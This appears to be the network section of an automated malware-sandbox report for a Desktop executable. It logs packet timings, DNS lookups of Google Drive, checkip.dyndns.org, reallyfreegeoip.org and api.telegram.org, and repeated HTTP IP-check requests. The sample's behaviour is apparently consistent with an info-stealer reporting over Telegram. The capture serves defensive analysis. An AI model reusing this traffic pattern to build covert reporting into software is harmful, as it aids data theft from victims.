                                                                                                          Jan 10, 2025 21:26:02.276571989 CET44349913149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:02.454267025 CET44349913149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:02.454355955 CET44349913149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:02.454461098 CET49913443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:02.455056906 CET49913443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:02.458142996 CET4989280192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:02.459357023 CET4991980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:02.463129997 CET8049892158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:02.463195086 CET4989280192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:02.464356899 CET8049919158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:02.464446068 CET4991980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:02.464571953 CET4991980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:02.469341993 CET8049919158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:05.312028885 CET8049919158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:05.313504934 CET49939443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:05.313549042 CET44349939149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:05.313654900 CET49939443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:05.313920975 CET49939443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:05.313934088 CET44349939149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:05.351475000 CET4991980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:05.928780079 CET44349939149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:05.930896997 CET49939443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:05.930926085 CET44349939149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:05.931127071 CET49939443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:05.931133986 CET44349939149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:06.180064917 CET44349939149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:06.180147886 CET44349939149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:06.180223942 CET49939443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:06.180705070 CET49939443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:06.183927059 CET4991980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:06.185296059 CET4994580192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:06.188958883 CET8049919158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:06.189059019 CET4991980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:06.190109968 CET8049945158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:06.190221071 CET4994580192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:06.190325022 CET4994580192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:06.195091963 CET8049945158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:09.752568007 CET8049945158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:09.757383108 CET4996780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:09.762217999 CET8049967158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:09.762336969 CET4996780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:09.762434959 CET4996780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:09.767177105 CET8049967158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:09.804579020 CET4994580192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:11.476747036 CET8049967158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:11.478574991 CET49981443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:11.478619099 CET44349981149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:11.479340076 CET4994580192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:11.480138063 CET49981443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:11.480385065 CET49981443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:11.480397940 CET44349981149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:11.484565020 CET8049945158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:11.484662056 CET4994580192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:11.523334980 CET4996780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:12.099795103 CET44349981149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:12.110443115 CET49981443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:12.110471010 CET44349981149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:12.110548019 CET49981443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:12.110558987 CET44349981149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:12.402734041 CET44349981149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:12.402812004 CET44349981149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:12.402883053 CET49981443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:12.403342962 CET49981443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:12.406708002 CET4996780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:12.407835007 CET4998880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:12.411732912 CET8049967158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:12.411803007 CET4996780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:12.412631035 CET8049988158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:12.412712097 CET4998880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:12.412791967 CET4998880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:12.417546034 CET8049988158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.006381035 CET8049988158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.007698059 CET49992443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:13.007754087 CET44349992149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.007996082 CET49992443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:13.008222103 CET49992443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:13.008244038 CET44349992149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.054594994 CET4998880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:13.638421059 CET44349992149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.640352964 CET49992443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:13.640367985 CET44349992149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.640578985 CET49992443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:13.640584946 CET44349992149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.818754911 CET44349992149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.818824053 CET44349992149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.818947077 CET49992443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:13.819305897 CET49992443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:13.826349974 CET4998880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:13.827210903 CET4999880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:13.831295967 CET8049988158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.831358910 CET4998880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:13.832078934 CET8049998158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:13.832148075 CET4999880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:13.832356930 CET4999880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:13.837085962 CET8049998158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:15.409513950 CET8049998158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:15.411673069 CET50006443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:15.411716938 CET44350006149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:15.411856890 CET50006443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:15.412148952 CET50006443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:15.412163019 CET44350006149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:15.460863113 CET4999880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:16.044369936 CET44350006149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.047653913 CET50006443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:16.047669888 CET44350006149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.047857046 CET50006443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:16.047862053 CET44350006149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.222280025 CET44350006149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.222359896 CET44350006149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.222819090 CET50006443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:16.223006964 CET50006443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:16.227449894 CET4999880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:16.228734970 CET5000780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:16.233534098 CET8050007158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.235440969 CET5000780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:16.235554934 CET5000780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:16.240276098 CET8050007158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.251821995 CET8049998158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.252090931 CET4999880192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:16.846008062 CET8050007158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.847471952 CET50008443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:16.847520113 CET44350008149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.847620964 CET50008443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:16.847852945 CET50008443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:16.847866058 CET44350008149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:16.898318052 CET5000780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:17.583405018 CET44350008149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:17.585360050 CET50008443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:17.585392952 CET44350008149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:17.585452080 CET50008443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:17.585463047 CET44350008149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:17.759254932 CET44350008149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:17.759489059 CET44350008149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:17.759567022 CET50008443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:17.759959936 CET50008443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:17.762919903 CET5000780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:17.763947964 CET5000980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:17.767844915 CET8050007158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:17.767927885 CET5000780192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:17.768754959 CET8050009158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:17.768825054 CET5000980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:17.768923044 CET5000980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:17.773657084 CET8050009158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:21.397540092 CET8050009158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:21.403759956 CET5001080192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:21.408682108 CET8050010158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:21.411087036 CET5001080192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:21.411242008 CET5001080192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:21.416017056 CET8050010158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:21.445287943 CET5000980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:22.824995995 CET8050010158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:22.867096901 CET5001080192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:25.191345930 CET5000980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:25.192147970 CET50011443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:25.192184925 CET44350011149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:25.192259073 CET50011443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:25.192584991 CET50011443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:25.192600012 CET44350011149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:25.196671009 CET8050009158.101.44.242192.168.2.8
                                                                                                          Jan 10, 2025 21:26:25.196767092 CET5000980192.168.2.8158.101.44.242
                                                                                                          Jan 10, 2025 21:26:25.833276987 CET44350011149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:25.835258007 CET50011443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:25.835300922 CET44350011149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:25.835352898 CET50011443192.168.2.8149.154.167.220
                                                                                                          Jan 10, 2025 21:26:25.835362911 CET44350011149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:26.089237928 CET44350011149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:26.089324951 CET44350011149.154.167.220192.168.2.8
                                                                                                          Jan 10, 2025 21:26:26.089435101 CET50011443192.168.2.8149.154.167.220
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 21:25:11.850749016 CET5648853192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:25:11.858333111 CET53564881.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:25:12.982795954 CET5061153192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:25:12.989809990 CET53506111.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:25:18.406151056 CET5626653192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:25:18.414288044 CET53562661.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:25:27.074492931 CET5186553192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:25:27.084958076 CET53518651.1.1.1192.168.2.8
                                                                                                          Jan 10, 2025 21:25:33.571993113 CET6186953192.168.2.81.1.1.1
                                                                                                          Jan 10, 2025 21:25:33.579266071 CET53618691.1.1.1192.168.2.8
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 21:25:11.850749016 CET192.168.2.81.1.1.10x1505Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:12.982795954 CET192.168.2.81.1.1.10xee65Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:18.406151056 CET192.168.2.81.1.1.10xbddbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:27.074492931 CET192.168.2.81.1.1.10x1df3Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:33.571993113 CET192.168.2.81.1.1.10x3777Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 21:25:11.858333111 CET1.1.1.1192.168.2.80x1505No error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:12.989809990 CET1.1.1.1192.168.2.80xee65No error (0)drive.usercontent.google.com216.58.206.33A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:18.414288044 CET1.1.1.1192.168.2.80xbddbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:18.414288044 CET1.1.1.1192.168.2.80xbddbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:18.414288044 CET1.1.1.1192.168.2.80xbddbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:18.414288044 CET1.1.1.1192.168.2.80xbddbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:18.414288044 CET1.1.1.1192.168.2.80xbddbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:18.414288044 CET1.1.1.1192.168.2.80xbddbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:27.084958076 CET1.1.1.1192.168.2.80x1df3No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:27.084958076 CET1.1.1.1192.168.2.80x1df3No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:27.084958076 CET1.1.1.1192.168.2.80x1df3No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:27.084958076 CET1.1.1.1192.168.2.80x1df3No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:27.084958076 CET1.1.1.1192.168.2.80x1df3No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:27.084958076 CET1.1.1.1192.168.2.80x1df3No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:27.084958076 CET1.1.1.1192.168.2.80x1df3No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 21:25:33.579266071 CET1.1.1.1192.168.2.80x3777No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                          • drive.google.com
                                                                                                          • drive.usercontent.google.com
                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • checkip.dyndns.org
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.849711158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:18.423686981 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:25:24.552647114 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:24 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 2079d68900816608a0c6abda4d7ddd3a
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 21:25:24.578846931 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 21:25:26.742908955 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 935f0d3c70e089e76f9f0c94186aa096
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                          Jan 10, 2025 21:25:33.177756071 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 21:25:33.567478895 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:33 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 7e7a1e646270750edae2d37be2fd1821
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.849745158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:36.781773090 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Jan 10, 2025 21:25:37.959285021 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: d196f92a07f061c0d37dd372ee9610da
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.849757158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:38.896965981 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:25:41.458250046 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:41 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 8092c89104e39ce8fc493c6d76dea6f4
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.849783158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:42.278125048 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 10, 2025 21:25:42.863244057 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:42 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: befa73fff03fbeeed290656603f9e3b0
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.849791158.101.44.242805624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 21:25:43.697879076 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
